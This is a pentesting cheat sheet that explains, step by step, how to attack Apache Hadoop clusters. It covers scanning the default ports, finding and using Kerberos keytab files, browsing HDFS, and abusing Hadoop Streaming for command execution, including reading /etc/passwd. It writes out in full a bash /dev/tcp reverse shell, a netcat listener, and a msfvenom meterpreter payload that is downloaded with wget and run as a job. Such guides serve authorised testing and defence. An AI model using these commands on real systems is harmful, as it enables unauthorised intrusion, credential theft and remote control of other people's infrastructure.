Apache Hadoop Pentesting
Last modified: 2023-04-02
Apache Hadoop is a collection of open-source software utilities that facilitates using a network of many computers to solve problems involving massive amounts of data and computation. It uses ports 8020, 9000, 50010, 50020, 50070, 50075, 50475 by default.
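To identify Hadoop services during reconnaissance, we can scan these default ports first. A minimal sketch, assuming nmap is available and 10.0.0.2 is a hypothetical target address:

# Scan the default Hadoop ports and try to identify service versions
nmap -p 8020,9000,50010,50020,50070,50075,50475 -sV 10.0.0.2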
Keytab files are used to authenticate to the KDC (Key Distribution Center) in Kerberos authentication. To find them, execute the following command on the target system.
find / -type f -name "*.keytab" 2>/dev/null
After finding them, we can use them to gather information or authenticate.
# Gather information from a keytab
# -k: Specify a keytab file
klist -k /path/to/example.keytab

# Authenticate to the Kerberos server and request a ticket.
# <principal_name>: stored in example.keytab. Run `klist -k example.keytab` to check it.
# -k: Use a keytab
# -V: Verbose mode
# -t <keytab_file>: Filename of the keytab to use
kinit <principal_name> -k -V -t /path/to/example.keytab

# e.g.
kinit user/hadoop.docker.com@EXAMPLE.COM -k -V -t /path/to/example.keytab
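If kinit succeeds, we can confirm the ticket was cached by listing the current credential cache:

# List tickets in the current credential cache
klist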
We can authenticate to other services by executing kinit. Then we can investigate the HDFS service with the following HDFS commands.
When authenticated, we need to find the path of the hdfs command shipped with Hadoop. This command allows us to execute file system commands against the data lake. If the binary is already in the default PATH (confirm by running echo $PATH), we don't have to find it. However, if it is not in the default PATH, find it by running the following command.
find / -type f -name hdfs 2>/dev/null
If we find the path, go to that directory and use the commands below. As mentioned above, if the hdfs path is not set in the PATH, we need to change into the directory where the hdfs binary exists.
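Alternatively, we can add the discovered directory to the PATH for the current session. A minimal sketch, assuming the hypothetical location /opt/hadoop/bin:

# Make the hdfs binary reachable without changing directories (path is an assumption)
export PATH=$PATH:/opt/hadoop/bin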
The hdfs dfs subcommands are similar to standard UNIX file system commands.
hdfs dfs -help

# List files in the HDFS root.
hdfs dfs -ls /
# -R: Recursive
hdfs dfs -ls -R /

# Get the contents of a file
hdfs dfs -cat /example.txt
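A few more common subcommands that mirror their UNIX counterparts (the paths here are illustrative):

# Create a directory
hdfs dfs -mkdir /tmp/test
# Upload a local file to HDFS
hdfs dfs -put /tmp/local.txt /tmp/test/local.txt
# Download a file from HDFS to the local file system
hdfs dfs -get /tmp/test/local.txt /tmp/downloaded.txt
# Remove a file (-r for directories)
hdfs dfs -rm /tmp/test/local.txt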
Hadoop Streaming can also be abused to execute arbitrary commands. First we need to create an arbitrary file that contains at least one character, then put it on HDFS.
echo hello > /tmp/hello.txt
hdfs dfs -put /tmp/hello.txt /tmp/hello.txt
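We can optionally confirm that the input file landed in HDFS before continuing:

# Verify the uploaded input file
hdfs dfs -cat /tmp/hello.txt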
Now execute the following command to achieve remote command execution.
Note that the -output directory must not already exist, so if we want to execute multiple commands, we have to delete the previous output directory or specify another name.
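If a previous run left /tmp/output in place, it can be removed first:

# Delete a previous output directory recursively
hdfs dfs -rm -r /tmp/output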
hadoop jar /path/to/hadoop-streaming-x.x.x.jar -input /tmp/hello.txt -output /tmp/output -mapper "cat /etc/passwd" -reducer NONE
We can see the result of the command in the output directory. For example,
hdfs dfs -ls /tmp/output
hdfs dfs -cat /tmp/output/part-00000
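The result can also be copied out of HDFS to the local file system, for example:

# Copy the result file from HDFS to a local path
hdfs dfs -get /tmp/output/part-00000 /tmp/result.txt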
To get an interactive reverse shell, create a reverse shell script on the target machine and put it on HDFS.
echo '/bin/bash -i >& /dev/tcp/10.0.0.1/4444 0>&1' > /tmp/shell.sh
hdfs dfs -put /tmp/shell.sh /tmp/shell.sh
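Depending on the environment, the mapper may need the script to be executable; if the job fails, marking it executable before submitting is worth trying:

# Optional: make the script executable before Hadoop Streaming ships it with -file
chmod +x /tmp/shell.sh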
On the local machine, start a listener.
nc -lvnp 4444
Now execute the following command.
# -mapper: The command to execute as the mapper (here the path of shell.sh)
# -file: The local path of shell.sh, shipped to the cluster with the job
hadoop jar /path/to/hadoop-streaming-x.x.x.jar -input /tmp/hello.txt -output /tmp/output -mapper "/tmp/shell.sh" -reducer NONE -file "/tmp/shell.sh" -background
We should get a shell on the local machine.
To get a meterpreter session instead, first create a reverse shell payload using msfvenom on the local machine and prepare a listener using msfconsole.
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf > shell.elf

msfconsole
msf> use exploit/multi/handler
msf> set payload linux/x86/meterpreter/reverse_tcp
msf> set lhost 10.0.0.1
msf> set lport 4444
msf> run
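The same handler can also be started non-interactively; a sketch using msfconsole's -q (quiet) and -x (run commands) options:

msfconsole -q -x 'use exploit/multi/handler; set payload linux/x86/meterpreter/reverse_tcp; set lhost 10.0.0.1; set lport 4444; run'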
Transfer the payload to the target machine.
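The wget command below assumes the payload is being served over HTTP on port 8000 from the local machine; one way to do that is Python's built-in web server:

# On the local machine, in the directory containing shell.elf
python3 -m http.server 8000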
wget http://10.0.0.1:8000/shell.elf -O /tmp/shell.elf

# Put it on HDFS.
hdfs dfs -put /tmp/shell.elf /tmp/shell.elf
Now execute the following command.
# -mapper: The command to execute as the mapper (here the path of shell.elf)
# -file: The local path of shell.elf, shipped to the cluster with the job
hadoop jar /path/to/hadoop-streaming-x.x.x.jar -input /tmp/hello.txt -output /tmp/output -mapper "/tmp/shell.elf" -reducer NONE -file "/tmp/shell.elf" -background
We should get a meterpreter session. To spawn an OS shell, run the shell command in meterpreter.